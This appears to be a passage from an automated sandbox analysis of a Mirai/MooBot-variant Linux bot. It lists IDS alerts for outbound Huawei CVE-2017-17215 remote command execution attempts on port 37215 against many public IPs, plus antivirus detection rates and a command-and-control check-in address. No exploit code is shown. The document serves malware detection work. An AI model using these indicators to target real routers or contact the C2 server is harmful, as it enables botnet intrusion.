              Timestamp:05/24/24-10:59:10.662632
              SID:2835222
              Source Port:56262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.492490
              SID:2835222
              Source Port:60396
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.186936
              SID:2835222
              Source Port:35836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062737
              SID:2829579
              Source Port:57540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802539
              SID:2835222
              Source Port:55826
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:12.725307
              SID:2829579
              Source Port:38414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.233868
              SID:2829579
              Source Port:46514
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.078230
              SID:2835222
              Source Port:37736
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575283
              SID:2829579
              Source Port:49266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.544196
              SID:2829579
              Source Port:40254
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.099647
              SID:2835222
              Source Port:34444
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.343028
              SID:2829579
              Source Port:53954
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.062768
              SID:2835222
              Source Port:51838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638035
              SID:2829579
              Source Port:51864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.060023
              SID:2829579
              Source Port:49306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396185
              SID:2835222
              Source Port:53836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:24.102603
              SID:2835222
              Source Port:49840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.308691
              SID:2829579
              Source Port:39366
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.570556
              SID:2829579
              Source Port:43590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572057
              SID:2829579
              Source Port:33648
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.447239
              SID:2835222
              Source Port:56088
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.503961
              SID:2829579
              Source Port:36822
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:08.638264
              SID:2829579
              Source Port:55670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.575805
              SID:2835222
              Source Port:46234
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.382953
              SID:2835222
              Source Port:41100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.396186
              SID:2835222
              Source Port:39790
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.459805
              SID:2829579
              Source Port:43720
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.865495
              SID:2829579
              Source Port:40450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:00.450187
              SID:2829579
              Source Port:40868
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.377690
              SID:2829579
              Source Port:52446
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.403028
              SID:2829579
              Source Port:58758
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:16.858423
              SID:2835222
              Source Port:48670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.574589
              SID:2829579
              Source Port:37746
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.505570
              SID:2829579
              Source Port:53246
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:38.541105
              SID:2835222
              Source Port:42252
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:22.049361
              SID:2829579
              Source Port:48262
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.572059
              SID:2829579
              Source Port:57930
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.372007
              SID:2835222
              Source Port:41130
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:40.576391
              SID:2829579
              Source Port:49222
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.507252
              SID:2835222
              Source Port:42368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:14.802248
              SID:2829579
              Source Port:39402
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334234
              SID:2829579
              Source Port:50408
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.334472
              SID:2835222
              Source Port:37430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.579323
              SID:2829579
              Source Port:43662
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.920366
              SID:2835222
              Source Port:58104
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.160537
              SID:2835222
              Source Port:50016
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.199169
              SID:2829579
              Source Port:49676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:32.365367
              SID:2835222
              Source Port:42640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:36.489581
              SID:2829579
              Source Port:56372
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.581678
              SID:2829579
              Source Port:60808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:34.431464
              SID:2835222
              Source Port:59644
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.161302
              SID:2835222
              Source Port:55914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:30.231705
              SID:2835222
              Source Port:51548
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.061340
              SID:2835222
              Source Port:42728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:56.128205
              SID:2829579
              Source Port:39100
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.400703
              SID:2835222
              Source Port:54306
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.548541
              SID:2829579
              Source Port:57938
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:10.663611
              SID:2835222
              Source Port:50924
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:04.545575
              SID:2835222
              Source Port:42052
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:28.188405
              SID:2835222
              Source Port:40406
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:06.585028
              SID:2835222
              Source Port:55150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.926250
              SID:2835222
              Source Port:52764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.976714
              SID:2829579
              Source Port:33988
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:54.071455
              SID:2835222
              Source Port:35284
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:19.975655
              SID:2835222
              Source Port:59922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.491801
              SID:2829579
              Source Port:55056
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:02.482905
              SID:2835222
              Source Port:52510
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:59:26.151019
              SID:2835222
              Source Port:41784
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:05/24/24-10:58:58.303308
              SID:2835222
              Source Port:48692
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: bot.x86.elfAvira: detected
              Source: bot.x86.elfVirustotal: Detection: 47%Perma Link
              Source: bot.x86.elfReversingLabs: Detection: 63%
              Source: bot.x86.elfJoe Sandbox ML: detected

              Networking

              barindex
              Source: TrafficSnort IDS: 2030490 ET TROJAN ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) 192.168.2.13:33340 -> 103.237.87.24:1235
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46778 -> 87.244.2.228:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46778 -> 87.244.2.228:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54054 -> 197.197.97.165:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54054 -> 197.197.97.165:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43518 -> 208.124.181.23:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43518 -> 208.124.181.23:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36604 -> 157.168.109.55:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36604 -> 157.168.109.55:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37266 -> 109.1.27.171:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37266 -> 109.1.27.171:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39920 -> 41.110.163.223:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39920 -> 41.110.163.223:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49384 -> 157.244.154.198:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49384 -> 157.244.154.198:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60294 -> 41.233.7.167:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60294 -> 41.233.7.167:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49284 -> 141.222.161.11:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49284 -> 141.222.161.11:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:52752 -> 41.25.79.119:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:52752 -> 41.25.79.119:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58302 -> 197.125.79.131:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58302 -> 197.125.79.131:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46880 -> 197.52.189.118:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46880 -> 197.52.189.118:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54592 -> 182.234.213.23:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54592 -> 182.234.213.23:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49278 -> 197.58.200.228:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49278 -> 197.58.200.228:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:58718 -> 157.13.197.70:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:58718 -> 157.13.197.70:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41948 -> 197.96.90.236:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41948 -> 197.96.90.236:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48268 -> 157.235.71.192:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48268 -> 157.235.71.192:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42614 -> 157.89.87.90:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42614 -> 157.89.87.90:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60340 -> 197.152.81.19:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60340 -> 197.152.81.19:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38178 -> 41.59.26.249:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38178 -> 41.59.26.249:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39502 -> 157.145.231.62:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39502 -> 157.145.231.62:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37256 -> 41.93.76.55:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37256 -> 41.93.76.55:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45546 -> 157.41.122.189:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45546 -> 157.41.122.189:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60414 -> 222.67.46.19:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60414 -> 222.67.46.19:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60592 -> 41.193.223.40:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60592 -> 41.193.223.40:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46174 -> 157.71.251.175:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46174 -> 157.71.251.175:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50620 -> 41.251.205.103:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50620 -> 41.251.205.103:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:57178 -> 41.106.66.96:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:57178 -> 41.106.66.96:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44156 -> 197.44.109.238:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44156 -> 197.44.109.238:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33176 -> 197.186.242.51:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33176 -> 197.186.242.51:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:35408 -> 157.76.143.153:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:35408 -> 157.76.143.153:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51846 -> 132.29.29.28:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51846 -> 132.29.29.28:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46466 -> 125.127.51.243:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46466 -> 125.127.51.243:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41510 -> 41.111.160.145:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41510 -> 41.111.160.145:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39878 -> 151.61.242.30:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39878 -> 151.61.242.30:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38412 -> 197.78.100.217:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38412 -> 197.78.100.217:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36456 -> 197.202.2.250:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36456 -> 197.202.2.250:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45278 -> 40.164.86.247:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45278 -> 40.164.86.247:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55458 -> 41.102.206.243:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55458 -> 41.102.206.243:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56232 -> 197.83.47.218:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56232 -> 197.83.47.218:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40246 -> 41.190.231.89:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40246 -> 41.190.231.89:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33380 -> 143.243.32.250:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33380 -> 143.243.32.250:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:36252 -> 197.171.38.12:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:36252 -> 197.171.38.12:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48292 -> 197.102.83.10:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48292 -> 197.102.83.10:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59962 -> 171.254.229.146:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59962 -> 171.254.229.146:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:54356 -> 84.20.71.121:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:54356 -> 84.20.71.121:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:50450 -> 41.1.40.173:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:50450 -> 41.1.40.173:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45416 -> 157.156.182.95:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45416 -> 157.156.182.95:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:43194 -> 157.184.5.53:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:43194 -> 157.184.5.53:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:40804 -> 157.137.49.12:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:40804 -> 157.137.49.12:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53862 -> 41.45.75.135:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53862 -> 41.45.75.135:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55712 -> 41.26.230.140:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55712 -> 41.26.230.140:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38368 -> 197.215.154.103:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38368 -> 197.215.154.103:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60682 -> 197.167.102.134:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60682 -> 197.167.102.134:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53786 -> 197.9.182.160:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53786 -> 197.9.182.160:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:48844 -> 85.181.52.217:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:48844 -> 85.181.52.217:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39418 -> 197.61.250.147:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39418 -> 197.61.250.147:37215
